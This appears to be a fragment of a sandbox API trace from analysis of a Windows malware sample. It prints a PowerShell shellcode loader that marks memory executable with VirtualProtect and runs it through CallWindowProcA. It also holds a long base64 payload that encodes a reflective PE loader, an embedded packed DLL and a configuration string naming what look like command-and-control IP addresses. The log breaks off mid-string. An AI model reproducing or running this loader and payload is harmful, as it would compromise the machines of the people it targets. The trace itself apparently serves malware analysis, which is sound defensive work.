$UnsafeNativeMethods.GetMethod(\"GetProcAddress\").Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),$UnsafeNativeMethods.GetMethod(\"GetModuleHandle\").Invoke($null,@($Module)))),$Procedure));}[Byte[]] $p=[Convert]::FromBase64String(\"{ps_shellcode}\");[Uint32[]] $op=0;([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga kernel32.dll VirtualProtect),(gd @([Byte[]],[UInt32],[UInt32],[UInt32[]]) ([IntPtr])))).Invoke($p,{ps_shellcode_length},0x40,$op);([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga user32.dll CallWindowProcA),(gd @([Byte[]],[Byte[]],[UInt32],[UInt32],[UInt32]) ([IntPtr])))).Invoke($p,$p,0,0,0);", lpSrch="{ps_shellcode}") returned="{ps_shellcode}\");[Uint32[]] $op=0;([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga kernel32.dll VirtualProtect),(gd @([Byte[]],[UInt32],[UInt32],[UInt32[]]) ([IntPtr])))).Invoke($p,{ps_shellcode_length},0x40,$op);([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga user32.dll CallWindowProcA),(gd @([Byte[]],[Byte[]],[UInt32],[UInt32],[UInt32]) ([IntPtr])))).Invoke($p,$p,0,0,0);" [0035.914] strncpy (in: _Dest=0x18dfe8, _Source="\");[Uint32[]] $op=0;([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga kernel32.dll VirtualProtect),(gd @([Byte[]],[UInt32],[UInt32],[UInt32[]]) ([IntPtr])))).Invoke($p,{ps_shellcode_length},0x40,$op);([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga user32.dll CallWindowProcA),(gd @([Byte[]],[Byte[]],[UInt32],[UInt32],[UInt32]) ([IntPtr])))).Invoke($p,$p,0,0,0);", _Count=0x1000 | out: _Dest="\");[Uint32[]] $op=0;([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga kernel32.dll VirtualProtect),(gd @([Byte[]],[UInt32],[UInt32],[UInt32[]]) ([IntPtr])))).Invoke($p,{ps_shellcode_length},0x40,$op);([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga user32.dll CallWindowProcA),(gd @([Byte[]],[Byte[]],[UInt32],[UInt32],[UInt32]) ([IntPtr])))).Invoke($p,$p,0,0,0);") returned="\");[Uint32[]] $op=0;([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga kernel32.dll VirtualProtect),(gd @([Byte[]],[UInt32],[UInt32],[UInt32[]]) ([IntPtr])))).Invoke($p,{ps_shellcode_length},0x40,$op);([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga user32.dll CallWindowProcA),(gd @([Byte[]],[Byte[]],[UInt32],[UInt32],[UInt32]) ([IntPtr])))).Invoke($p,$p,0,0,0);" [0035.914] strncpy (in: _Dest=0x3b05cc, _Source="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", _Count=0x5061 | out: _Dest="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